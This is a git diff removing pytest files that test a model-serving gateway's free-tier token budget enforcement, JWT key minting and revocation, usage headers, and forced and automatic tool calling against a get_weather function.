- -import os, time, pytest -from conftest import bearer, ensure_free_key, get_limit - -USAGE_HEADERS = ( - "x-odhu-usage-total-tokens", - "x-odhu-usage-input-tokens", - "x-odhu-usage-output-tokens", -) - -def _model_url(http, base_url, key, model_name): - r = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30) - assert r.status_code == 200, f"/v1/models failed: {r.status_code} {r.text[:200]}" - items = (r.json().get("data") or r.json().get("models") or []) - hit = next((m for m in items if m.get("id") == model_name or m.get("name") == model_name), None) - assert hit and hit.get("url"), f"model {model_name!r} not found or missing url" - return hit["url"] - -def _tokens_used(h): - tot = h.get("x-odhu-usage-total-tokens") - if tot: - try: - return int(tot) - except: - pass - try: - return int(h.get("x-odhu-usage-input-tokens") or 0) + int(h.get("x-odhu-usage-output-tokens") or 0) - except: - return 0 - -@pytest.mark.skipif(not os.getenv("FREE_OC_TOKEN"), reason="FREE_OC_TOKEN not set") -def test_free_token_budget_enforced(http, base_url, model_name): - key = ensure_free_key(http) - url = _model_url(http, base_url, key, model_name) - - # Pull limits from cluster, allow env override - token_budget = get_limit("TOKEN_LIMIT_FREE", "free_tokens", 1000) - burst = get_limit("RATE_LIMIT_BURST", "free_burst", 16) - - # Shape traffic so we stay under request burst but exceed token budget - calls = min(burst - 1, 5) if burst > 1 else 1 - per_call = max(64, (token_budget // max(calls, 1)) + 64) # “expensive” calls - sleep_s = float(os.getenv("BURST_SLEEP", "0.05")) - - consumed, codes = 0, [] - for _ in range(calls): - r = http.post( - f"{url}/v1/chat/completions", - headers=bearer(key), - json={ - "model": model_name, - "messages": [{"role": "user", "content": "Repeat X 500 times."}], - "max_tokens": per_call, - "temperature": 0, - }, - timeout=60, - ) - codes.append(r.status_code) - if r.status_code in (200, 201): - if not any(h in r.headers for h in 
USAGE_HEADERS): - pytest.skip("Usage headers not present; token accounting disabled on this cluster.") - consumed += _tokens_used(r.headers) - if consumed >= token_budget: - # Fire one extra to observe 429 due to token limit - time.sleep(sleep_s) - r2 = http.post( - f"{url}/v1/chat/completions", - headers=bearer(key), - json={ - "model": model_name, - "messages": [{"role": "user", "content": "Repeat X 500 times."}], - "max_tokens": per_call, - "temperature": 0, - }, - timeout=60, - ) - codes.append(r2.status_code) - break - else: - break - time.sleep(sleep_s) - - assert any(c == 429 for c in codes), ( - f"never hit token limiter; budget={token_budget}, consumed={consumed}, codes={codes}" - ) diff --git a/test/maas_billing_tests_independent/tests/test_tokens.py b/test/maas_billing_tests_independent/tests/test_tokens.py deleted file mode 100644 index 7fd4d72f9..000000000 --- a/test/maas_billing_tests_independent/tests/test_tokens.py +++ /dev/null @@ -1,96 +0,0 @@ -# ============================ -# What this file tests (short) -# ============================ -# - We can mint MaaS tokens and they look like real JWTs. -# - The minted token actually works to call /v1/models. -# - Bad TTL input is rejected with 400. -# - After we revoke a token, it stops working. -# - Model responses include usage headers (token counts). 
- -from conftest import bearer, parse_usage_headers, USAGE_HEADERS, ensure_free_key -import json, base64 - -def _b64url_decode(s): - pad = "=" * (-len(s) % 4) - return base64.urlsafe_b64decode((s + pad).encode("utf-8")) - -def test_minted_token_is_jwt(maas_key): - parts = maas_key.split(".") - assert len(parts) == 3 - hdr = json.loads(_b64url_decode(parts[0]).decode("utf-8")) - assert isinstance(hdr, dict) - -def test_tokens_issue_201_and_schema(http, base_url): - from conftest import FREE_OC_TOKEN, mint_maas_key, bearer as bh - # mint_maas_key returns a single string (the MaaS key) - key = mint_maas_key(http, base_url, FREE_OC_TOKEN, minutes=10) - assert isinstance(key, str) and len(key) > 10 - # prove the key works and don’t hang forever - r_ok = http.get(f"{base_url}/v1/models", headers=bh(key), timeout=30) - assert r_ok.status_code == 200 - -def test_tokens_invalid_ttl_400(http, base_url): - from conftest import FREE_OC_TOKEN, http_post - url = f"{base_url}/v1/tokens" - code, body, r = http_post( - http, - url, - headers=bearer(FREE_OC_TOKEN), - json={"expiration": "4hours"}, - timeout=30, # add timeout so it can’t hang - ) - assert code == 400 - -def test_tokens_models_happy_then_revoked_fails(http, base_url, model_name): - from conftest import FREE_OC_TOKEN, mint_maas_key, revoke_maas_key, bearer - - # 1) Mint a MaaS key from the current OC user token - key = mint_maas_key(http, base_url, FREE_OC_TOKEN, minutes=10) - - # 2) Discover the model URL - models = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30).json() - items = models.get("data") or models.get("models") or [] - target = next((m for m in items if m.get("id")==model_name or m.get("name")==model_name), None) - assert target and target.get("url"), "model not found or missing url" - murl = target["url"] - - payload = {"model": model_name, - "messages":[{"role":"user","content":"hi"}], - "max_tokens": 32} - - # 3) Works before revoke - r_ok = http.post(f"{murl}/v1/chat/completions", 
headers=bearer(key), json=payload, timeout=60) - assert r_ok.status_code in (200, 201) - - # 4) Revoke the key - r_del = revoke_maas_key(http, base_url, FREE_OC_TOKEN, key) - assert r_del.status_code in (200, 202, 204) - - # 5) Fails after revoke - r_bad = http.post(f"{murl}/v1/chat/completions", headers=bearer(key), json=payload, timeout=60) - assert r_bad.status_code in (401, 403) - -def test_usage_headers_present(http, base_url, model_name): - from conftest import bearer, ensure_free_key, parse_usage_headers - - key = ensure_free_key(http) - - # discover model URL - models = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30).json() - items = models.get("data") or models.get("models") or [] - target = next((m for m in items if m.get("id")==model_name or m.get("name")==model_name), None) - assert target and target.get("url"), "model not found or missing url" - murl = target["url"] - - r = http.post( - f"{murl}/v1/chat/completions", - headers=bearer(key), - json={"model": model_name, "messages":[{"role":"user","content":"Say hi"}], "temperature":0}, - timeout=60, - ) - assert r.status_code in (200, 201), f"unexpected {r.status_code}: {r.text[:200]}" - - usage = parse_usage_headers(r) - # assert presence and non-negative total - assert "x-odhu-usage-total-tokens" in usage, f"No usage headers present: {dict(r.headers)}" - assert int(usage["x-odhu-usage-total-tokens"]) >= 0 diff --git a/test/maas_billing_tests_independent/tests/test_tool_calling.py b/test/maas_billing_tests_independent/tests/test_tool_calling.py deleted file mode 100644 index 655747dcf..000000000 --- a/test/maas_billing_tests_independent/tests/test_tool_calling.py +++ /dev/null @@ -1,168 +0,0 @@ -import os -import json -import subprocess, shlex -import pytest - -def _parse_args(args_raw): - if isinstance(args_raw, dict): - return args_raw - return json.loads(args_raw) - -@pytest.mark.skipif( - os.getenv("TOOL_CALLING_ENABLED", "false").lower() not in ("1", "true", "yes"), - 
reason="Tool calling not enabled for this environment", -) -def test_tool_calling_forced(http, base_url, model_name, tools_spec): - - # 1️⃣ Mint MaaS token using oc whoami -t - oc_token = subprocess.check_output(shlex.split("oc whoami -t"), text=True).strip() - mint_url = f"{base_url}/v1/tokens" - r = http.post( - mint_url, - headers={"Authorization": f"Bearer {oc_token}", "Content-Type": "application/json"}, - json={"expiration": "20m"}, - timeout=30, - ) - assert r.status_code in (200, 201), f"Token mint failed: {r.status_code} {r.text}" - token = r.json()["token"] - - # 2️⃣ List models - models_url = f"{base_url}/v1/models" - r = http.get(models_url, headers={"Authorization": f"Bearer {token}"}, timeout=30) - assert r.status_code == 200, f"Models list failed: {r.status_code} {r.text}" - models = r.json()["data"] - - model_entry = next((m for m in models if m["id"] == model_name), None) - assert model_entry, f"Model {model_name} not found in /v1/models" - model_url = model_entry["url"] - chat_url = f"{model_url}/v1/chat/completions" - print(f"[debug] posting to: {chat_url}") - - # 3️⃣ Tool-calling test (forced) - payload = { - "model": model_name, - "messages": [ - {"role": "system", "content": "When tool_choice is set, ALWAYS return exactly one tool call with fully-formed JSON arguments."}, - {"role": "user", "content": "What's the weather in Boston, MA? 
Call the get_weather tool and pass location='Boston' and unit='fahrenheit'."} - ], - "tools": tools_spec, - "tool_choice": {"type": "function", "function": {"name": "get_weather"}}, - "temperature": 0, - "max_tokens": 128, - } - - r = http.post( - chat_url, - headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"}, - json=payload, - timeout=60, - ) - assert r.status_code in (200, 201), f"Chat call failed: {r.status_code} {r.text}" - - data = r.json() - msg = data["choices"][0]["message"] - tool_calls = msg.get("tool_calls") or [] - print("[tool_calling] endpoint:", chat_url) - print("[tool_calling] http:", r.status_code) - print("[tool_calling] tool_calls:", json.dumps(tool_calls, indent=2)) - print("[tool_calling] full_response:", json.dumps(data, indent=2)) - assert tool_calls, "No tool_calls in response" - assert len(tool_calls) == 1, f"Expected exactly one tool_call, got {len(tool_calls)}" - - call0 = tool_calls[0] - fn = (call0.get("function") or {}).get("name") - args_raw = (call0.get("function") or {}).get("arguments") - args = _parse_args(args_raw) - - assert fn == "get_weather", f"Unexpected tool: {fn}" - assert ("city" in args or "location" in args), f"Missing city/location in args: {args}" - -@pytest.mark.skipif( - os.getenv("TOOL_CALLING_ENABLED", "false").lower() not in ("1","true","yes"), - reason="Tool calling not enabled for this environment", -) -def test_tool_calling_auto(http, base_url, model_name, tools_spec): - # 1) Mint MaaS token (same as forced) - oc_token = subprocess.check_output(shlex.split("oc whoami -t"), text=True).strip() - mint_url = f"{base_url}/v1/tokens" - r = http.post( - mint_url, - headers={"Authorization": f"Bearer {oc_token}", "Content-Type": "application/json"}, - json={"expiration": "20m"}, - timeout=30, - ) - assert r.status_code in (200, 201), f"Token mint failed: {r.status_code} {r.text}" - token = r.json()["token"] - - # 2) Discover model URL (same as forced) - models_url = 
f"{base_url}/v1/models" - r = http.get(models_url, headers={"Authorization": f"Bearer {token}"}, timeout=30) - assert r.status_code == 200, f"Models list failed: {r.status_code} {r.text}" - models = r.json()["data"] - model_entry = next((m for m in models if m["id"] == model_name), None) - assert model_entry, f"Model {model_name} not found in /v1/models" - model_url = model_entry["url"] - chat_url = f"{model_url}/v1/chat/completions" - print(f"[debug] posting to: {chat_url}") - - # 3) Auto tool-calling payload - payload = { - "model": model_name, - "messages": [ - { - "role": "system", - "content": ( - "You are a tool-using assistant. When the user asks about weather, " - "you MUST call the get_weather tool exactly once with JSON arguments. " - "Do not answer in plain text before the tool call." - ), - }, - {"role": "user", "content": "What's the weather in Boston, MA today? Use Fahrenheit."}, - ], - "tools": [ - { - "type": "function", - "function": { - "name": "get_weather", - "description": "Get current weather.", - "parameters": { - "type": "object", - "properties": { - "location": {"type": "string", "description": "City, e.g. 
'Boston, MA'"}, - "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, - }, - "required": ["location"], - "additionalProperties": False, - }, - }, - } - ], - "tool_choice": "auto", - "temperature": 0, - "max_tokens": 384, # give Qwen room beyond its prelude - "parallel_tool_calls": False, # keep it to one call - } - - r = http.post( - chat_url, - headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"}, - json=payload, - timeout=60, - ) - assert r.status_code in (200, 201), f"Chat call failed: {r.status_code} {r.text}" - data = r.json() - msg = data["choices"][0]["message"] - tool_calls = msg.get("tool_calls") or [] - print("[tool_calling_auto] http:", r.status_code) - print("[tool_calling_auto] tool_calls:", json.dumps(tool_calls, indent=2)) - print("[tool_calling_auto] full_response:", json.dumps(data, indent=2)) - - # Soft assertion: if the model still chooses not to call, skip (backend is configured for auto) - if not tool_calls: - pytest.skip("Model chose not to emit tool_calls in auto mode") - - fn = (tool_calls[0].get("function") or {}).get("name") - args_raw = (tool_calls[0].get("function") or {}).get("arguments") - args = args_raw if isinstance(args_raw, dict) else json.loads(args_raw) - assert fn == "get_weather" - assert args.get("location"), f"Missing location in args: {args}" \ No newline at end of file